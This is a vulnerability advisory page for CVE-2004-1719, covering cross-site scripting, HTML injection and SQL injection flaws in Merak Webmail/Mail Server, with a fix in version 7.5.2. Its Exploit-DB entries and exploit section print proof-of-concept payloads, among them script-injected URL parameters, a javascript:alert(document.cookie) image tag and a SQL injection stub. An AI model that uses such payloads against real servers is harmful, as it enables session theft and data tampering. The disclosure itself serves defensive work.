CVE-2004-1719
CVSS 4.3
Published: 2004-08-17 00:00:00
Last modified: 2016-10-17 22:59:47

[Original] Multiple cross-site scripting (XSS) vulnerabilities in Merak Webmail Server 5.2.7 allow remote attackers to inject arbitrary web script or HTML via the (1) category, (2) cserver, (3) ext, (4) global, (5) showgroups, or (6) showlite parameters to address.html, or the (7) spage or (8) autoresponder parameters to settings.html, the (9) folder parameter to readmail.html, or the (10) attachmentpage_text_error parameter to attachment.html, (11) folder, (12) ct, or (13) cv parameters to calendar.html, (14) an <img> tag, or (15) the subject of an e-mail message.


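[CNNVD] Merak Mail Server Webmail Multiple Vulnerabilities (CNNVD-200408-138)

        Multiple cross-site scripting (XSS) vulnerabilities exist in Merak Webmail Server 5.2.7. A remote attacker can inject arbitrary web script or HTML via the (1) category, (2) cserver, (3) ext, (4) global, (5) showgroups, or (6) showlite parameters to address.html, or the (7) spage or (8) autoresponder parameters to settings.html, the (9) folder parameter to readmail.html, or the (10) attachmentpage_text_error parameter to attachment.html, the (11) folder, (12) ct, or (13) cv parameters to calendar.html, (14) a tag, or (15) the subject of an e-mail message.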

- CVSS (base score)

CVSS score: 4.3 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Access complexity: [--]
Access vector: [--]
Authentication: [--]

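- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details used for detection)

No related OVAL definition found

- Official database links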

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1719
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1719
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-138
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=109279057326044&w=2
(UNKNOWN)  BUGTRAQ  20040817 Vulnerabilities in Merak Webmail Server
http://packetstormsecurity.nl/0408-exploits/merak527.txt
(VENDOR_ADVISORY)  MISC  http://packetstormsecurity.nl/0408-exploits/merak527.txt
http://securitytracker.com/id?1010969
(UNKNOWN)  SECTRACK  1010969
http://www.securityfocus.com/bid/10966
(VENDOR_ADVISORY)  BID  10966
http://xforce.iss.net/xforce/xfdb/17024
(VENDOR_ADVISORY)  XF  merak-xss(17024)

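- Vulnerability information

Merak Mail Server Webmail Multiple Vulnerabilities
Medium risk  Cross-site scripting
2004-08-17 00:00:00 2006-04-07 00:00:00
Remote
        Multiple cross-site scripting (XSS) vulnerabilities exist in Merak Webmail Server 5.2.7. A remote attacker can inject arbitrary web script or HTML via the (1) category, (2) cserver, (3) ext, (4) global, (5) showgroups, or (6) showlite parameters to address.html, or the (7) spage or (8) autoresponder parameters to settings.html, the (9) folder parameter to readmail.html, or the (10) attachmentpage_text_error parameter to attachment.html, the (11) folder, (12) ct, or (13) cv parameters to calendar.html, (14) a tag, or (15) the subject of an e-mail message.

- Advisories and patches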

        The vendor has released version 7.5.2 of Merak Mail Server. This includes an updated version of Merak Webmail Server that reportedly fixes these vulnerabilities.
        Merak Mail Server 7.4.5
        

- Vulnerability information (24377)

Merak Mail Server 7.4.5 address.html Multiple Parameter XSS (EDBID:24377)
php webapps
2004-07-17 Verified
0 Criolabs
N/A
source: http://www.securityfocus.com/bid/10966/info

The webmail package embedded in Merak Mail Server is reported prone to multiple vulnerabilities.

The vulnerabilities reported are:
- Multiple cross-site scripting vulnerabilities
- An HTML injection vulnerability
- A PHP source code disclosure vulnerability
- An SQL injection vulnerability

These vulnerabilities are reported to exist in versions prior to 7.5.2.

/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category="><script>alert()</script>&cserver=&ext=
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=">[XSS]&ext=
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=&ext=">[XSS]
/address.html?id=[id]&sort=&selectsort=&global=">[XSS]&showgroups=&showlite=&category=&cserver=&ext=
/address.html?id=[id]&sort=&selectsort=&global=&showgroups=">[XSS]&showlite=&category=&cserver=&ext=
/address.html?id=[id]&sort=&selectsort=&global=&showgroups=&showlite=">[XSS]&category=&cserver=&ext=		

- Vulnerability information (24378)

Merak Mail Server 7.4.5 settings.html Multiple Parameter XSS (EDBID:24378)
php webapps
2004-07-17 Verified
0 Criolabs
N/A
source: http://www.securityfocus.com/bid/10966/info
 

/settings.html?autoresponder=1&id=[id]&spage=">[XSS]
/settings.html?autoresponder=">[XSS]&id=[id]&spage=0
		

- Vulnerability information (24379)

Merak Mail Server 7.4.5 attachment.html attachmentpage_text_error Parameter XSS (EDBID:24379)
php webapps
2004-07-17 Verified
0 Criolabs
N/A
source: http://www.securityfocus.com/bid/10966/info
  

/attachment.html?attachmentpage_text_error=">[XSS]		

- Vulnerability information (24380)

Merak Mail Server 7.4.5 HTML Message Body XSS (EDBID:24380)
php webapps
2004-07-17 Verified
0 Criolabs
N/A
source: http://www.securityfocus.com/bid/10966/info
   

<IMG alt="" hspace=0 src="javascript:alert(document.cookie)" align=baseline border=0><IFRAME src="http://www.google.com"></body> </html> </IFRAME>		

- Vulnerability information

9037
IceWarp WebMail address.html Multiple Parameter XSS
Remote / Network Access Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- Vulnerability description

Merak Mail Server contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate multiple variables upon submission to the address.html script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

- Timeline

2004-08-17 2004-08-04
2004-08-17 Unknown

- Solution

Upgrade to version 7.5.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Vulnerability information

Merak Mail Server Webmail Multiple Vulnerabilities
Design Error 10966
Yes No
2004-08-17 12:00:00 2009-07-12 06:16:00
Criolabs <security@criolabs.net> disclosed these vulnerabilities.

- Affected program versions

Merak Webmail Server 5.2.7
Merak Mail Server 7.4.5
Merak Mail Server 7.5.2

- Unaffected program versions

Merak Mail Server 7.5.2

- Vulnerability discussion

The webmail package embedded in Merak Mail Server is reported prone to multiple vulnerabilities.

The vulnerabilities reported are:
- Multiple cross-site scripting vulnerabilities
- An HTML injection vulnerability
- A PHP source code disclosure vulnerability
- An SQL injection vulnerability

These vulnerabilities are reported to exist in versions prior to 7.5.2.

- Exploit

An exploit is not required. Examples were provided:

Cross-site scripting examples:
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category="><script>alert()</script>&cserver=&ext=
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=">[XSS]&ext=
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=&ext=">[XSS]
/address.html?id=[id]&sort=&selectsort=&global=">[XSS]&showgroups=&showlite=&category=&cserver=&ext=
/address.html?id=[id]&sort=&selectsort=&global=&showgroups=">[XSS]&showlite=&category=&cserver=&ext=
/address.html?id=[id]&sort=&selectsort=&global=&showgroups=&showlite=">[XSS]&category=&cserver=&ext=
/settings.html?autoresponder=1&id=[id]&spage=">[XSS]
/settings.html?autoresponder=">[XSS]&id=[id]&spage=0
/readmail.html?id=[id]&folder=">[XSS]
/attachment.html?attachmentpage_text_error=">[XSS]
/calendar.html?id=1&schedule=admin%40merakdemo.com&cv=n&folder=<script>alert()</script>
/calendar.html?id=1&schedule=koko%40merakdemo.com&sf=addevent&cv=d&ct=">[XSS]
/calendar.html?id=[id]&cv=">[XSS]&ct=[ct]&sf=addevent&ESdhour=8

HTML injection example, email body contents:
<IMG alt="" hspace=0 src="javascript:alert(document.cookie)" align=baseline border=0><IFRAME src="http://www.google.com"></body> </html> </IFRAME>

SQL injection example:
/calendar.html?id=1'&schedule=[SQL]

- Solution

The vendor has released version 7.5.2 of Merak Mail Server. This includes an updated version of Merak Webmail Server that reportedly fixes these vulnerabilities.


Merak Mail Server 7.4.5
